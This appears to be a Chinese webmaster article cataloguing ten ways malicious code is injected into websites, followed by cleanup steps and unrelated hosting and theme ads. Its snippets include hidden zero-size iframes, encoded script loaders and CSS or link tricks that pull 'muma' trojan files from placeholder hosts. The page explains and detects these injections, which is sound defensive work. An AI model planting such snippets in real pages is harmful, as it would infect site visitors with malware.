网站木马存在形式和清除方法h123网址大全http://www.h123.net.cn
木马的存在形态有如下几种
一:框架挂马iframe src=地址width=0 height=0/iframe
二:js文件挂马
首先将以下代码document.write("iframe width='0' height='0' src='地址'/i frame
保存为xxx. js
则JS挂马代码为script language=javascript src=xxx. js/script
三:js变形加密
SCRIPT language="JScript.Encode"src=http://www.xxx.com/muma.txt/scriptmuma. txt可改成任意后缀
四:body挂马body onload="window. location='地址' ;"/body
五:隐蔽挂马top.document.body. innerHTML =top.document.body. innerHTML + ' \r\niframesrc="' ">http://www.xxxxxxxxxxxxxx"/iframe注意此网址
为虚拟仅为说明木马情况。
六:css中挂马body {
background-image:url (' javascript:document.write("scriptsrc=http://www.XXX.net/muma. j s/script") ' ) }
七:JAJA挂马
SCRIPT language=javascriptwindow.open ("地址
", "", "toolbar=no, location=no,directories=no, status=no,menubar=no, scro llbars=no,width=1,height=1") ;
/script
八:图片伪装htmliframe src="网马地址" height=0 width=0/iframeimg src="图片地址"/center
/html
九:伪装调用frameset rows="444,0" cols="*"frame src="打开网页" framborder="no" scrolling="auto"noresize marginwidth="0"margingheight="0"frame src="网马地址" frameborder="no" scrolling="no"noresize marginwidth="0"margingheight="0"
/frameset
十:高级欺骗a href="(迷惑连接地址显示这个地址指向木马地址)"onMouseOver="www_szweb_cn() ; return true;"页面要显示的内容/a
SCRIPT Language="JavaScript"function www_szweb_cn()
{var url="网马地址";open(url, "NewWindow", "toolbar=no, location=no,directories=no,
status=no,menubar=no, scrollbars=no,resizable=no, copyhistory=yes,width=800,height=600, left=10, top=10") ;}
/SCRIPT
清除木马的具体操作步骤如下
1)清除网页中的木马
删除现有的网页中的木马主要有这样类似的代码:iframe„或者„xxx. js/script
出现上面这些特征的代码如果里面包含的网址不是自己网站的那基本上就是中了木马了。我们比较常见的木马是iframe,对网站首页以及其它主要页面的源代码进行检查用记事本打开这些页面后 以“iframe”为关键字进行搜索找到后可以查看是否是挂马代码。不过碰上有经验的黑客会编写一段代码将整句挂马代码进行加密这样我们就很难找到网页中的挂马代码。这时可以将所有网页文件按修改时间进行排序如果有个别网页被修改我们可以很快地发现。
2)刺激google快速更新
木马被清除了 google上还是被屏蔽着。这时就想办法让google爬虫重新检索网站更新检索结果。这样 网站的屏蔽才能被解除。刺激google更新的的手段有如下一些
1)持续更新网站首页的文章
2)重新给google提交网站地图
3)为网站去找一些高质量的外链
4)申请审核。当网站有病毒后在google网站管理员工具内的“诊断”页面会有一个提示就是说网站含有恶意代码然后会提示你可以“申请审核”填写相关信息提交。h123网址大全http://www.h123.net.cn
wordpress高级跨屏企业主题,通用响应式跨平台站点开发,自适应PC端+各移动端屏幕设备,高级可视化自定义设置模块+高效的企业站搜索优化。wordpress绿色企业自适应主题采用标准的HTML5+CSS3语言开发,兼容当下的各种主流浏览器: IE 6+(以及类似360、遨游等基于IE内核的)、Firefox、Google Chrome、Safari、Opera等;同时支持移动终端的常用浏览器应...
hostsailor怎么样?hostsailor成立多年,是一家罗马尼亚主机商家,机房就设在罗马尼亚,具说商家对内容管理的还是比较宽松的,商家提供虚拟主机、VPS及独立服务器,今天收到商家推送的八月优惠,针对所有的产品都有相应的优惠,商家的VPS产品分为KVM和OpenVZ两种架构,OVZ的比较便宜,有这方面需要的朋友可以看看。点击进入:hostsailor商家官方网站HostSailor优惠活动...
Friendhosting商家在前面的篇幅中也又陆续介绍到,是一家保加利亚主机商,主要提供销售VPS和独立服务器出租业务,数据中心分布在:荷兰、保加利亚、立陶宛、捷克、乌克兰和美国洛杉矶等。这不近期黑色星期五活动,商家也有推出了黑五优惠,VPS全场一次性45折,虚拟主机4折,全球多机房可选,老用户续费可获9折加送1个月使用时长,VDS折后最低仅€14.53/年,有需要的可以看看。Friendhos...